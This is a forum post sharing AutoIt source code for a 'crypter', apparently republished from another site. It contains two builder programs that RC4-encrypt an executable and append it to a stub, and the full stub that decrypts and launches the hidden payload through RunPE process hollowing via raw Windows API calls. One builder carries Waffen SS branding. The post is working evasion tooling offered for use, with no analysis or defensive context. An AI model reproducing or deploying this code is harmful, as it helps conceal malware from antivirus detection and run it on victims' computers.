Expermicid Posted May 31, 2012 Share Posted May 31, 2012 (edited) Cliente: [lenguaje=autoit] ;Créditos: A.D.I Fênix ;http://www.orkut.com.br/Main#Community?cmm=25309445'>http://www.orkut.com.br/Main#Community?cmm=25309445'>http://www.orkut.com.br/Main#Community?cmm=25309445 ; #include #include #include #include #include #Region ### START Koda GUI section ### Form=c:\documents and settings\eu\meus documentos\form1.kxf $Form1_1 = GUICreate("Waffen SS crypter by Rudeb0y777 ", 709, 381, 209, 113) $Button1 = GUICtrlCreateButton("Abrir", 104, 160, 139, 65) GUICtrlSetFont(-1, 12, 800, 0, "Algerian") GUICtrlSetColor(-1, 0x0000FF) GUICtrlSetBkColor(-1, 0xD4D0C8) $Button2 = GUICtrlCreateButton("Encriptar", 368, 160, 147, 65) GUICtrlSetFont(-1, 12, 800, 0, "Algerian") GUICtrlSetColor(-1, 0x0000FF) GUICtrlSetBkColor(-1, 0xD4D0C8) $Input1 = GUICtrlCreateInput("Arquivo...", 120, 112, 401, 21) $Pic1 = GUICtrlCreatePic("C:\Documents and Settings\Eu\Meus documentos\Meus documentos\Downloads\fotos variadas\waffen-ss-flag2.JPG", 0, 0, 705, 377, BitOR($SS_NOTIFY,$WS_GROUP,$WS_CLIPSIBLINGS)) SoundPlay(@WindowsDir & "nova pasta\teste.mp3", 1) SoundSetWaveVolume(100) GUISetState(@SW_SHOW) #EndRegion ### END Koda GUI section ### While 1 $nMsg = GUIGetMsg() Switch $nMsg Case $GUI_EVENT_CLOSE Exit Case $Form1_1 Case $Button1 GUICtrlSetData($Input1, FileOpenDialog("Selecione o arquivo para encriptar", @DesktopDir, "Executáveis(*.exe)")) Case $Button2 if GuiCtrlRead($Input1) = "" then return $stub = FileOpen(@ScriptDir & "\stub.exe" , 16) $arquivo2 = FileOpen(GuiCtrlRead($Input1), 16) $st = FileRead($stub) $ar = FileRead($arquivo2) $ar = _RC4($ar,"LOLxD") Func _RC4($DATA, $KEY) Local $OPCODE = "0xC81001006A006A005356578B551031C989C84989D7F2AE484829C88945F085C00F84DC000000B90001000088C82C0188840DEFFEFFFFE2F38365F4008365FC00817DFC000100007D478B45FC31D2F775F0920345100FB6008B4DFC0FB68C0DF0FEFFFF01C80345F425FF0000008945F48B75FC8A8435F0FEFFFF8B7DF486843DF0FEFFFF888435F0FEFFFFFF45FCEBB08D9DF0FEFFFF31FF89FA39550C76638B85ECFEFFFF4025FF0000008985ECFEFFFF89D80385ECFEFFFF0FB6000385E8FEFFFF25FF0000008985E8FEFFFF89DE03B5ECFEFFFF8A0689DF03BDE8FEFFFF860788060FB60E0FB60701C181E1FF0000008A840DF0FEFFFF8B750801D6300642EB985F5E5BC9C21000" Local $CODEBUFFER = DllStructCreate("byte[" & BinaryLen($OPCODE) & "]") DllStructSetData($CODEBUFFER, 1, $OPCODE) Local $BUFFER = DllStructCreate("byte[" & BinaryLen($DATA) & "]") DllStructSetData($BUFFER, 1, $DATA) DllCall("user32.dll", "none", "CallWindowProc", "ptr", DllStructGetPtr($CODEBUFFER), "ptr", DllStructGetPtr($BUFFER), "int", BinaryLen($DATA), "str", $KEY, "int", 0) Local $RET = DllStructGetData($BUFFER, 1) $BUFFER = 0 $CODEBUFFER = 0 Return $RET EndFunc $salvar = FileOpen(FileSaveDialog("Salvar Como...", @DesktopDir, "Executáveis(*.exe)") & ".exe", 18) FileWrite($salvar, $st) FileWrite($salvar, StringToBinary("rud777")) FileWrite($salvar, $ar) FileClose($stub) FileClose($Input1) FileClose($Salvar) MsgBox(64, "Encriptado!!!", "By Rud3b0y777") EndSwitch WEnd [/lenguaje] Otro Cliente: [lenguaje=autoit] ;Créditos: A.D.I Fênix ;http://www.orkut.com.br/Main#Community?cmm=25309445 ; #Include #Include #Include #Include #Include #Include #Region ### START Koda GUI section ### Form= Opt("GuiOnEventMode",1) $a = GUICreate(" Crypter ! Autoit*-*", 378, 406, 192, 124) GUISetIcon("C:\Documents and Settings\Gilmar\Desktop\projeto novo\icone.ico") GUISetBkColor(0x000000) $Pic1 = GUICtrlCreatePic("C:\Documents and Settings\Gilmar\Desktop\Autoit\foto.jpg", 0, 0, 377, 345) $Abrir = GUICtrlCreateButton("Abrir", 208, 376, 73, 25, $WS_GROUP) $Cryptar = GUICtrlCreateButton("Cryptar", 296, 376, 73, 25, $WS_GROUP) $Arquivo = GUICtrlCreateInput("Arquivo", 0, 352, 377, 21) GUISetOnEvent($Gui_Event_Close, "sr") GUISetState(@SW_SHOW) #EndRegion ### END Koda GUI section ### GUICtrlSetOnEvent($Abrir, "abrir") GUICtrlSetOnEvent($Cryptar, "Cs") Func abrir() GUICtrlSetData($Arquivo, FileOpenDialog("Selecione o arquivo para encriptar", @DesktopDir, "Executáveis(*.exe)")) EndFunc Func Cs() if GuiCtrlRead($Arquivo) = "" then return $stub = FileOpen(@ScriptDir & "\Stub.exe" , 16) $arquivo2 = FileOpen(GuiCtrlRead($Arquivo), 16) $st = FileRead($stub) $ar = FileRead($arquivo2) $ar = _RC4($ar, "Key") $salvar = FileOpen(FileSaveDialog("Salvar Como...", @DesktopDir, "Executáveis(*.exe)") & ".exe", 18) FileWrite($salvar, $st) FileWrite($salvar, StringToBinary("Separador")) FileWrite($salvar, $ar) FileClose($stub) FileClose($Arquivo) FileClose($Salvar) MsgBox(64, " Crypter !", "Encryptado com sucesso !") EndFunc Func sr() Exit EndFunc While 1 Sleep(1) WEnd [/lenguaje] Stub: [lenguaje=autoit] ;Créditos: A.D.I Fênix ;http://www.orkut.com.br/Main#Community?cmm=25309445 ; #NoTrayIcon ; $FileStub = Sleep(150) $file = FileOpen(@ScriptFullPath, 0) $Data = FileRead($file) $Data = StringMid($Data, StringInstr($Data, "separador") + StringLen ("separador")) $Data = _RC4($Data, "key") _RunPE($Data) Func _RC4($DATA, $KEY) Local $OPCODE = "0xC81001006A006A005356578B551031C989C84989D7F2AE484829C88945F085C00F84DC000000B90001000088C82C0188840DEFFEFFFFE2F38365F4008365FC00817DFC000100007D478B45FC31D2F775F0920345100FB6008B4DFC0FB68C0DF0FEFFFF01C80345F425FF0000008945F48B75FC8A8435F0FEFFFF8B7DF486843DF0FEFFFF888435F0FEFFFFFF45FCEBB08D9DF0FEFFFF31FF89FA39550C76638B85ECFEFFFF4025FF0000008985ECFEFFFF89D80385ECFEFFFF0FB6000385E8FEFFFF25FF0000008985E8FEFFFF89DE03B5ECFEFFFF8A0689DF03BDE8FEFFFF860788060FB60E0FB60701C181E1FF0000008A840DF0FEFFFF8B750801D6300642EB985F5E5BC9C21000" Local $CODEBUFFER = DllStructCreate("byte[" & BinaryLen($OPCODE) & "]") DllStructSetData($CODEBUFFER, 1, $OPCODE) Local $BUFFER = DllStructCreate("byte[" & BinaryLen($DATA) & "]") DllStructSetData($BUFFER, 1, $DATA) DllCall("user32.dll", "none", "CallWindowProc", "ptr", DllStructGetPtr($CODEBUFFER), "ptr", DllStructGetPtr($BUFFER), "int", BinaryLen($DATA), "str", $KEY, "int", 0) Local $RET = DllStructGetData($BUFFER, 1) $BUFFER = 0 $CODEBUFFER = 0 Return $RET EndFunc Func _RunPE($BBINARYIMAGE) #region 1. PREPROCESSING PASSED Local $BBINARY = Binary($BBINARYIMAGE) Local $TBINARY = DllStructCreate("byte[" & BinaryLen($BBINARY) & "]") DllStructSetData($TBINARY, 1, $BBINARY) Local $PPOINTER = DllStructGetPtr($TBINARY) #region 2. CREATING NEW PROCESS Local $TSTARTUPINFO = DllStructCreate("dword cbSize;" & "ptr Reserved;" & "ptr Desktop;" & "ptr Title;" & "dword X;" & "dword Y;" & "dword XSize;" & "dword YSize;" & "dword XCountChars;" & "dword YCountChars;" & "dword FillAttribute;" & "dword Flags;" & "ushort ShowWindow;" & "ushort Reserved2;" & "ptr Reserved2;" & "ptr hStdInput;" & "ptr hStdOutput;" & "ptr hStdError") Local $TPROCESS_INFORMATION = DllStructCreate("ptr Process;" & "ptr Thread;" & "dword ProcessId;" & "dword ThreadId") Local $ACALL = DllCall("kernel32.dll", "int", "CreateProcessW", "wstr", @AutoItExe, "ptr", 0, "ptr", 0, "ptr", 0, "int", 0, "dword", 4, "ptr", 0, "ptr", 0, "ptr", DllStructGetPtr($TSTARTUPINFO), "ptr", DllStructGetPtr($TPROCESS_INFORMATION)) If @error Or Not $ACALL[0] Then Return SetError(1, 0, 0) EndIf Local $HPROCESS = DllStructGetData($TPROCESS_INFORMATION, "Process") Local $HTHREAD = DllStructGetData($TPROCESS_INFORMATION, "Thread") #region 3. FILL CONTEXT STRUCTURE Local $TCONTEXT = DllStructCreate("dword ContextFlags;" & "dword Dr0;" & "dword Dr1;" & "dword Dr2;" & "dword Dr3;" & "dword Dr6;" & "dword Dr7;" & "dword ControlWord;" & "dword StatusWord;" & "dword TagWord;" & "dword ErrorOffset;" & "dword ErrorSelector;" & "dword DataOffset;" & "dword DataSelector;" & "byte RegisterArea[80];" & "dword Cr0NpxState;" & "dword SegGs;" & "dword SegFs;" & "dword SegEs;" & "dword SegDs;" & "dword Edi;" & "dword Esi;" & "dword Ebx;" & "dword Edx;" & "dword Ecx;" & "dword Eax;" & "dword Ebp;" & "dword Eip;" & "dword SegCs;" & "dword EFlags;" & "dword Esp;" & "dword SegS") DllStructSetData($TCONTEXT, "ContextFlags", 65538) $ACALL = DllCall("kernel32.dll", "int", "GetThreadContext", "ptr", $HTHREAD, "ptr", DllStructGetPtr($TCONTEXT)) If @error Or Not $ACALL[0] Then DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $HPROCESS, "dword", 0) Return SetError(2, 0, 0) EndIf #region 4. READ PE-FORMAT Local $TIMAGE_DOS_HEADER = DllStructCreate("char Magic[2];" & "ushort BytesOnLastPage;" & "ushort Pages;" & "ushort Relocations;" & "ushort SizeofHeader;" & "ushort MinimumExtra;" & "ushort MaximumExtra;" & "ushort SS;" & "ushort SP;" & "ushort Checksum;" & "ushort IP;" & "ushort CS;" & "ushort Relocation;" & "ushort Overlay;" & "char Reserved[8];" & "ushort OEMIdentifier;" & "ushort OEMInformation;" & "char Reserved2[20];" & "dword AddressOfNewExeHeader", $PPOINTER) $PPOINTER += DllStructGetData($TIMAGE_DOS_HEADER, "AddressOfNewExeHeader") Local $SMAGIC = DllStructGetData($TIMAGE_DOS_HEADER, "Magic") If Not ($SMAGIC == "MZ") Then DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $HPROCESS, "dword", 0) Return SetError(3, 0, 0) EndIf Local $TIMAGE_NT_SIGNATURE = DllStructCreate("dword Signature", $PPOINTER) $PPOINTER += 4 If DllStructGetData($TIMAGE_NT_SIGNATURE, "Signature") <> 17744 Then DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $HPROCESS, "dword", 0) Return SetError(4, 0, 0) EndIf Local $TIMAGE_FILE_HEADER = DllStructCreate("ushort Machine;" & "ushort NumberOfSections;" & "dword TimeDateStamp;" & "dword PointerToSymbolTable;" & "dword NumberOfSymbols;" & "ushort SizeOfOptionalHeader;" & "ushort Characteristics", $PPOINTER) Local $INUMBEROFSECTIONS = DllStructGetData($TIMAGE_FILE_HEADER, "NumberOfSections") $PPOINTER += 20 Local $TIMAGE_OPTIONAL_HEADER = DllStructCreate("ushort Magic;" & "ubyte MajorLinkerVersion;" & "ubyte MinorLinkerVersion;" & "dword SizeOfCode;" & "dword SizeOfInitializedData;" & "dword SizeOfUninitializedData;" & "dword AddressOfEntryPoint;" & "dword BaseOfCode;" & "dword BaseOfData;" & "dword ImageBase;" & "dword SectionAlignment;" & "dword FileAlignment;" & "ushort MajorOperatingSystemVersion;" & "ushort MinorOperatingSystemVersion;" & "ushort MajorImageVersion;" & "ushort MinorImageVersion;" & "ushort MajorSubsystemVersion;" & "ushort MinorSubsystemVersion;" & "dword Win32VersionValue;" & "dword SizeOfImage;" & "dword SizeOfHeaders;" & "dword CheckSum;" & "ushort Subsystem;" & "ushort DllCharacteristics;" & "dword SizeOfStackReserve;" & "dword SizeOfStackCommit;" & "dword SizeOfHeapReserve;" & "dword SizeOfHeapCommit;" & "dword LoaderFlags;" & "dword NumberOfRvaAndSizes", $PPOINTER) $PPOINTER += 96 Local $IMAGIC = DllStructGetData($TIMAGE_OPTIONAL_HEADER, "Magic") If $IMAGIC <> 267 Then DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $HPROCESS, "dword", 0) Return SetError(5, 0, 0) EndIf Local $IENTRYPOINTNEW = DllStructGetData($TIMAGE_OPTIONAL_HEADER, "AddressOfEntryPoint") $PPOINTER += 128 Local $POPTIONALHEADERIMAGEBASENEW = DllStructGetData($TIMAGE_OPTIONAL_HEADER, "ImageBase") Local $IOPTIONALHEADERSIZEOFIMAGENEW = DllStructGetData($TIMAGE_OPTIONAL_HEADER, "SizeOfImage") #region 5. CLEAR EVERYTHING THAT THIS NEW PROCESS HAVE MAPPED $ACALL = DllCall("ntdll.dll", "int", "NtUnmapViewOfSection", "ptr", $HPROCESS, "ptr", $POPTIONALHEADERIMAGEBASENEW) If @error Or $ACALL[0] Then DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $HPROCESS, "dword", 0) Return SetError(6, 0, 0) EndIf #region 6. ALLOCATE 'NEW' MEMORY SPACE $ACALL = DllCall("kernel32.dll", "ptr", "VirtualAllocEx", "ptr", $HPROCESS, "ptr", $POPTIONALHEADERIMAGEBASENEW, "dword", $IOPTIONALHEADERSIZEOFIMAGENEW, "dword", 12288, "dword", 64) If @error Or Not $ACALL[0] Then DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $HPROCESS, "dword", 0) Return SetError(7, 0, 0) EndIf Local $PREMOTECODE = $ACALL[0] #region 7. GET AND WRITE NEW PE-HEADERS Local $PHEADERS_NEW = DllStructGetPtr($TIMAGE_DOS_HEADER) Local $IOPTIONALHEADERSIZEOFHEADERSNEW = DllStructGetData($TIMAGE_OPTIONAL_HEADER, "SizeOfHeaders") $ACALL = DllCall("kernel32.dll", "int", "WriteProcessMemory", "ptr", $HPROCESS, "ptr", $PREMOTECODE, "ptr", $PHEADERS_NEW, "dword", $IOPTIONALHEADERSIZEOFHEADERSNEW, "dword*", 0) If @error Or Not $ACALL[0] Then DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $HPROCESS, "dword", 0) Return SetError(8, 0, 0) EndIf #region 8. WRITE SECTIONS Local $TIMAGE_SECTION_HEADER Local $ISIZEOFRAWDATA, $PPOINTERTORAWDATA Local $IVIRTUALADDRESS For $I = 1 To $INUMBEROFSECTIONS $TIMAGE_SECTION_HEADER = DllStructCreate("char Name[8];" & "dword UnionOfVirtualSizeAndPhysicalAddress;" & "dword VirtualAddress;" & "dword SizeOfRawData;" & "dword PointerToRawData;" & "dword PointerToRelocations;" & "dword PointerToLinenumbers;" & "ushort NumberOfRelocations;" & "ushort NumberOfLinenumbers;" & "dword Characteristics", $PPOINTER) $ISIZEOFRAWDATA = DllStructGetData($TIMAGE_SECTION_HEADER, "SizeOfRawData") $PPOINTERTORAWDATA = DllStructGetPtr($TIMAGE_DOS_HEADER) + DllStructGetData($TIMAGE_SECTION_HEADER, "PointerToRawData") $IVIRTUALADDRESS = DllStructGetData($TIMAGE_SECTION_HEADER, "VirtualAddress") If $ISIZEOFRAWDATA Then $ACALL = DllCall("kernel32.dll", "int", "WriteProcessMemory", "ptr", $HPROCESS, "ptr", $PREMOTECODE + $IVIRTUALADDRESS, "ptr", $PPOINTERTORAWDATA, "dword", $ISIZEOFRAWDATA, "dword*", 0) If @error Or Not $ACALL[0] Then DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $HPROCESS, "dword", 0) Return SetError(9, $I, 0) EndIf EndIf $PPOINTER += 40 Next #region 9. NEW ENTRY POINT DllStructSetData($TCONTEXT, "Eax", $PREMOTECODE + $IENTRYPOINTNEW) #region 10. SET NEW CONTEXT $ACALL = DllCall("kernel32.dll", "int", "SetThreadContext", "ptr", $HTHREAD, "ptr", DllStructGetPtr($TCONTEXT)) If @error Or Not $ACALL[0] Then DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $HPROCESS, "dword", 0) Return SetError(10, 0, 0) EndIf #region 11. RESUME THREAD $ACALL = DllCall("kernel32.dll", "int", "ResumeThread", "ptr", $HTHREAD) If @error Or $ACALL[0] = -1 Then DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $HPROCESS, "dword", 0) Return SetError(11, 0, 0) EndIf #region 12. RETURN SUCCESS Return DllStructGetData($TPROCESS_INFORMATION, "ProcessId") EndFunc ;Créditos: A.D.I Fênix [/lenguaje] Fuente: C-51 Saludos Edited February 16, 2014 by Expermicid Link to comment Share on other sites More sharing options...
Recommended Posts